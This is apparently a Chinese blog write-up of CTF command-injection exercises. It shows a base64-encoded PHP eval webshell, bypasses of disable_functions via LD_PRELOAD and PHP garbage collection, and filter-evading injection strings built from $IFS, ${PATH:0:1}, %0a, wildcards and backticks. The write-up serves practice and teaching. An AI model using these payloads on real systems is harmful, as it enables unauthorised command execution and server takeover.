命令执行绕过的练习(一)

最新推荐文章于 2024-06-01 16:25:22 发布
最新推荐文章于 2024-06-01 16:25:22 发布
阅读量1.7k 收藏 4
点赞数 7
分类专栏: Web常见漏洞 Web 文章标签: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43625917/article/details/107873778
版权

0x00 前言

总结完命令执行漏洞的相关绕过知识,做一下CTF题巩固一下,并总结一下做题过程。

0x01 GKCTF-Check_In

考点:绕过disable_function
题目源码:

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

经测试发现可以连接上木马,但不能执行系统命令,从而无法执行根目录下的/readflag命令。

//eval($_POST['qwzf']); -> ZXZhbCgkX1BPU1RbJ3F3emYnXSk7
蚁剑连接:?Ginkgo=ZXZhbCgkX1BPU1RbJ3F3emYnXSk7

然后查看phpinfo信息,发现disable_function禁用了命令执行函数。于是可以想到下面几种方式绕过disable_function
1.利用ld_preload
在phpinfo信息发现没有禁用mail函数,所以可以利用ld_preload绕过disable_function

在蚁剑里的/tmp目录下,传入之前文章提到的qwzf2.php和hack2.so
//include('/tmp/qwzf2.php'); -> aW5jbHVkZSgnL3RtcC9xd3pmMi5waHAnKTs=
?Ginkgo=aW5jbHVkZSgnL3RtcC9xd3pmMi5waHAnKTs=
POST:cmd=/readflag&outpath=/tmp/test&sopath=/tmp/hack2.so

在这里插入图片描述
2.利用php_gc
因为php环境是php7.3,在PHP7.0~PHP7.3之间,所以也可以用php7-gc-bypass的POC打一下即可得到flag:

//include('/tmp/exploit.php'); -> aW5jbHVkZSgnL3RtcC9leHBsb2l0LnBocCcpOw==
?Ginkgo=aW5jbHVkZSgnL3RtcC9leHBsb2l0LnBocCcpOw==
//访问一下,即可得到flag

在这里插入图片描述
更多方法参考:bypass disable_function多种方法+实例

0x02 CTFhub技能树RCE-过滤cat

考点:绕过文件内容读取(绕过cat)
首先

?ip=|ls

发现flag文件flag_4052237514444.php
题目给出源码,发现过滤了cat。于是绕过cat

?ip=|more flag_4052237514444.php
#more/less/head/tac/tail/nl/vi/vim/uniq/file -f/sort,以及od -c命令均可

然后查看源代码,得到flag

0x03 CTFhub技能树RCE-过滤空格

考点:绕过空格
首先

?ip=|ls

发现flag文件flag_1304577872279.php
题目给出源码,发现过滤了空格。于是绕过空格

?ip=|cat${IFS}flag_1304577872279.php
#$IFS$9/%09/</均可

然后查看源代码,得到flag

0x04 CTFhub技能树RCE-过滤目录分隔符

考点:绕过目录分隔符/
首先

?ip=|ls

发现flag文件所在目录flag_is_here
题目给出源码,发现过滤了目录分隔符/。于是绕过/
有两种方法:
方法一:使用linux的系统环境变量${PATH:0:1}代替/

?ip=|ls flag_is_here${PATH:0:1}
得到flag文件flag_19492409018809.php
?ip=|cat flag_is_here${PATH:0:1}flag_19492409018809.php
查看源代码得到flag

方法二:利用;分隔符连续执行指令

?ip=;cd flag_is_here;ls
得到flag文件flag_19492409018809.php
?ip=;cd flag_is_here;cat flag_19492409018809.php
查看源代码得到flag

0x05 CTFhub技能树RCE-过滤运算符

考点:绕过运算符|&
题目给出源码,发现过滤了运算符|&。于是直接利用;分隔符绕过

?ip=;ls
得到flag文件flag_16845171801250.php
?ip=;cat flag_16845171801250.php
查看源代码得到flag

0x06 CTFhub技能树RCE-综合过滤练习

考点:绕过运算符、;、空格、目录分隔符/catflag和ctfhub关键字

<?php
$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

题目给出源码,发现过滤了运算符(|&)、;、空格、目录分隔符、cat、flag关键字和ctfhub关键字
于是构造以下payload进行绕过:

%0a绕过运算符和;
$IFS$9代替空格
${PATH:0:1}代替/
more代替cat
通配符代替flag

?ip=%0als #得到flag文件目录flag_is_here
?ip=%0als$IFS$9*_is_here${PATH:0:1} #得到flag文件flag_1832680587320.php
?ip=%0amore$IFS$9*_is_here${PATH:0:1}*_1832680587320.php #查看源代码得到flag

0x07 GXYCTF2019-Ping Ping Ping

考点:绕过空格+绕过黑名单(也可内敛执行绕过)

?ip=|ls

得到flag.phpindex.php。然后查看flag.php内容:

?ip=|cat flag.php

发现响应:/?ip= fxck your space!,于是绕过空格

?ip=|cat${IFS}flag.php #发现响应:/?ip= 1fxck your symbol!,很明显不行
?ip=|cat$IFS$9flag.php

发现响应:/?ip= fxck your flag!,应该是过滤了flag关键字,于是可以绕过黑名单或使用内敛执行绕过
(1)方法一:绕过黑名单
经测试可以使用拼接绕过

?ip=;a=g;cat$IFS$9fla$a.php

然后查看源码,得到flag
在这里插入图片描述
(2)方法二:内敛执行绕过

?ip=|cat$IFS$9`ls`

在这里插入图片描述

0x08 后记

学过命令执行的相关绕过后,再做这些题,发现竟如此容易。由此看来,技术知识和CTF题目是相辅相成的。继续努力吧!

Qwzf
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第十四天命令执行绕过练习
代码审计
03-21 371
第一题 //1. 读取同目录下的bihuo.txt 文件的内容 linux环境下自己创建bihuo.txt <?php error_reporting(0);#屏蔽错误 if(isset($_GET['c'])) { $c = $_GET['c']; if(!preg_match('/bihuo/i', $c)) { #过滤bihuo关键字 eval($c);#代码执行 } } else { highlight_file(__FILE__); } ?&g
flag.php
萍水间人的小天地
01-29 1831
写在前面 好吧我承认我是看了别人的wp,目前还很菜 然而我看了wp也不会做。 初探 页面 进去之后是一个什么都点不动的页面。。 然后有提示 hint 联系到可能是SQL注入 于是在URL后面加一个hint参数 http://123.206.87.240:8002/flagphp/?hint=1 得到一串代码: <?php error_reporting(0)...
PHP——PHP文件操作及命令执行—运算符
cldimd的博客
03-17 244
什么是运算符: 1、在PHP中,大部分时间都是在操作数据。 2、运算符是用来处理这些数据的方式。 一、赋值运算符。 “=” 表示将右边的结果(可以是变量、数据、常量和其它运算出来的结果),保存到内存的某个位置,然后将位置的内存地址赋值给...
CTF 命令执行绕过总结
最新发布
jnszstmei的博客
06-01 404
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示。或:rce-xor-or.php & rce-xor-or.py。# ls -t >shell 将输出输入到shell文件中。异或:rce-xor.php & rce-xor.py。%09(url传递)(cat%09flag.php)sh /flag 2>%261 //报错出文件内容。2、1使用空变量$*和$@,$x,${x}绕过。7、异或无符号(过滤0-9a-zA-Z)more:一页一页的显示档案内容。
ctfshow——54命令执行,需要严格的过滤
manerzi的博客
11-02 954
ctfshow——54命令执行,需要严格的过滤
命令执行绕过总结
box
07-23 2231
命令执行绕过总结 Linux篇 命令拼接 a=who b=ami $a$b //输出whoami 常用字符使用 & 表示将任务置于后台执行 ; 多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块 && 只有在 && 左边的命令返回真(命令返回值 $? == 0),&&右边的命令才会被执行。 || 只有在 || 左边的命令返回假(命令返回值 $? == 1),
SQL注入绕过实战案例
08-31
本文将深入探讨SQL注入的概念、工作原理,并通过"SQL注入实战案例"来阐述如何进行有效防御和绕过。我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入(SQL Injection)是...
pikachu漏洞练习环境
10-25
在这样的练习环境中,你可能会遇到诸如SQL注入、跨站脚本(XSS)、命令注入、文件包含、权限绕过等常见的Web漏洞类型。这些漏洞都是网络应用中常见的安全隐患,理解和掌握它们对于网络安全专业人员来说至关重要。 ...
靶机操作练习,earth 靶机实战练习
09-08
我们使用了IP的十六进制形式绕过这一限制,但由于靶机的防护策略,反弹shell未能成功。为了提权,我们寻找了SUID权限的二进制文件,但没有直接的利用方式。于是,我们利用nc工具在Kali上监听并接收靶机发送的reset_...
pdf-thumbnailer:Lob 编码练习
06-28
输入只能是 PDF 通过直接在服务器路由上使用 Joi 验证,我能够在非 pdf 上传的情况下绕过路由处理程序中的响应处理。 先从Lob提供的Hapi骨架开始提供的框架建立了一个在端口 8000 上运行的基本服务器。我进一步扩展...
SQL注入练习.rar
06-25
攻击者可以通过在输入字段中插入恶意SQL代码,绕过正常的安全控制,执行未授权的操作。 在 "sqli-labs" 靶场中,每个关卡可能代表一个特定的SQL注入场景,如基于错误的注入、基于时间的延迟注入、盲注、多语句注入...
【CTF整理】WriteUp Bugku flag.php
SunnyCat
10-30 886
WriteUp Bugku flag.php 题目:http://123.206.87.240:8002/flagphp 点击:flag.php 随便输入点击没有反应,右键查看源码,没什么有价值的发现 想到提示hint,将之作为url参数提交试试,出现php代码。 顺序:1、2、3、4、5、 <?php error_reporting(0); include_once("flag.php"); // 1、flag的位置 $cookie = $_COOKIE['ISecer']; //
引入flag.php文件,WEB_flag在index里
weixin_28888459的博客
03-10 810
题解:打开题目 点击进去,除了一个test5后什么也没有,但是发现了URL中的地址后缀变化,是典型的文件包含漏洞,file关键字是提示,其实也是CTF的套路 题目标题就说明了,flag在index中,要用到php的封装协议,在文件后缀添加 ?file=php://filter/read=convert.base64-encode/resource=index.php即http://123.206...
每天一道ctf
whisper921的博客
10-28 882
有这样一行代码
第二十三天
weixin_46653764的博客
07-03 348
一、来做这个题 1、第一题 flag在这里 打开后是这样的,然后点开链接,跳转到404,可查看元素,该链接跳转的地址是↓ 所以应该是被重定向了,那我就burp抓包来repeater一下,然后就得到flag.php页面的回应,flag拿到手!!! 2、第二天 打开宝盒 根据题目,我就先保存图片文件看看吧,用pad++打开,一堆乱码,大概flag就藏在里面,但我找不到hhahah 3、 看题目 本地管理员?那就伪造ip,把ip改成127.0.0.1,这里就要用到http头里面的 X-Forwarde
引入flag.php文件,php文件自包含的奇淫技巧
weixin_30072453的博客
03-10 1079
原标题:php文件自包含的奇淫技巧前言刷题的时候刚好看到一个比较厉害的phpinfo的利用姿势,原理不是很懂,题目来自百度杯12月第四场Blog进阶版以下是writeup解题过程注册以后发现了一个编辑器,网上搜索一番,编辑器可以列目录:1http://931088e56a06460eb01b88a21186b77e156bc67ce775433a.changame.ichunqiu.com/kin...
ctfshowPHP特性
遇事不决冲冲冲
08-23 4407
web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 数组绕过正则表达式,也就是说我们不按规定去
【BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
algae
08-29 9552
【BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li
BUUCTF:[GXYCTF2019]Ping Ping Ping
末初的CSDN博客
10-20 1593
题目地址:https://buuoj.cn/challenges#[GXYCTF2019]Ping%20Ping%20Ping ?ip=明显存在命令执行注入,使用;或者|闭合上一条命令 经过fuzz测试,过滤了空格、bash字符、flag字符、以及一些特殊符号 空格绕过这里使用$IFS$9 /?ip=;id;whoami;pwd;ls;ls$IFS$9-lha 我做题时用的是 /?ip=;cat$IFS$9`ls` 直接将当前目录下所有文件全部cat出来,查看源码发现flag 题.
web命令执行常见绕过方式
07-10
常见的web命令执行绕过方式包括: 1. 输入过滤绕过:通过使用各种编码、特殊字符或绕过函数来绕过输入过滤机制,如使用URL编码、HTML编码、Unicode编码等。 2. 命令分隔符绕过:通过插入特殊字符或空格来绕过命令分隔符,如使用分号、竖线、反斜杠等。 3. 输入截断绕过:通过在输入中插入特殊字符,使输入被截断,从而绕过输入过滤命令分隔符。 4. 操作符绕过:通过使用不同的操作符或操作符的变体来绕过命令执行过滤,如使用逻辑操作符、比较操作符等。 5. 输入验证绕过:通过绕过输入验证机制,如绕过正则表达式、绕过黑名单等,来执行恶意命令。 6. 操作系统命令绕过:通过绕过操作系统命令执行的限制,如使用操作系统特定的命令命令的变体、命令替换等。 7. 文件扩展名绕过:通过伪装文件扩展名或使用特殊的文件扩展名来绕过文件上传过滤器,从而执行恶意命令。 请注意,这些绕过方式仅供参考,具体的绕过方式可能因应用程序和环境而异。在编写安全的web应用程序时,应该采取适当的输入验证、过滤和编码措施来防止命令执行漏洞的利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值